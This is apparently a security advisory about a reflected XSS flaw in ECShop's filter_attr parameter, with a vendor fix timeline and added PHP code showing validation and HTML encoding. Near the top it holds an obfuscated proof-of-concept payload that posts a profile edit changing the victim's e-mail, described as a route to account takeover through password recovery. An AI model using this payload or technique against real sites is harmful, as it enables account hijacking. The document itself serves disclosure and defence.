Use the XSS to construct a POST that submits a profile edit, changing the account's e-mail address to one the attacker can operate, then use password recovery.

Proof of vulnerability:

?id=3&price_min=0&price_max=0&filter_attr=0.0.0.199%22%3E%3Cscript%3Eeval%28String.fromCharCode%28120,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,120,46,111,112,101,110,40,34,112,111,115,116,34,44,34,104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,47,116,101,115,116,47,101,99,115,104,111,112,95,103,98,107,50,55,50,47,117,115,101,114,46,112,104,112,34,41,59,120,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,84,121,112,101,34,44,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,34,41,59,120,46,115,101,110,100,40,34,97,99,116,61,97,99,116,95,101,100,105,116,95,112,114,111,102,105,108,101,38,101,109,97,105,108,61,120,120,120,64,49,54,51,46,99,111,109,34,41,59%29%29%3C/script%3E%3C%22

Of course, exploiting it by way of file inclusion is more concise.


Vendor statement
Filtering is not strict enough; a fix is in progress.

2010-09-03: The patch has been released. Patch download address:

2010-09-06: Encode and decode the URL, and remove unnecessary parameters.
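The proof of concept above works because the `filter_attr` value is echoed back into the page unencoded, so the `">` at the end of the dotted number closes the surrounding attribute and the `<script>` that follows runs. The example below is added here to show the fix the vendor timeline describes (encode on output, drop values that do not belong); it is not ECShop's own code, and the function names, the `<input>` markup and the sample input are assumptions constructed for illustration.

```php
<?php
// Added example, not ECShop code: contrasts the unescaped reflection that
// allows the attribute breakout with a validated, HTML-encoded version.
// Function names and markup are assumed for illustration only.

// Vulnerable pattern: the raw query value is written straight into an attribute,
// so a value containing "> terminates the attribute and the tag.
function render_filter_vulnerable(string $filter_attr): string
{
    return '<input type="hidden" name="filter_attr" value="' . $filter_attr . '">';
}

// Step 1 (the vendor's "remove unnecessary parameters"): filter_attr is a dotted
// list of integers such as 0.0.0.199, so anything else is rejected up front.
function validate_filter_attr(string $filter_attr): ?string
{
    return preg_match('/^\d+(\.\d+)*$/', $filter_attr) === 1 ? $filter_attr : null;
}

// Step 2 (the vendor's "encode"): HTML-encode on output regardless of validation,
// so a quote or angle bracket can never close the attribute or open a tag.
function render_filter_hardened(string $filter_attr): string
{
    $safe    = validate_filter_attr($filter_attr) ?? '0';
    $encoded = htmlspecialchars($safe, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="hidden" name="filter_attr" value="' . $encoded . '">';
}

// Constructed probe: same structure as the report's payload (dotted number,
// attribute breakout, script tag) with the script body replaced by a marker.
$probe = '0.0.0.199"><script>alert(1)</script><"';

// Unescaped: the probe's <script> element lands in the page as live markup.
echo render_filter_vulnerable($probe), PHP_EOL;

// Hardened: validation rejects the probe and the field falls back to "0";
// a legitimate value passes through unchanged but encoded.
echo render_filter_hardened($probe), PHP_EOL;
echo render_filter_hardened('0.0.0.199'), PHP_EOL;
```

Both steps matter: the regular expression removes the breakout characters from this parameter, while `htmlspecialchars` with `ENT_QUOTES` protects every other place the value is reflected, including inside single-quoted attributes that a digits-only check alone would not cover.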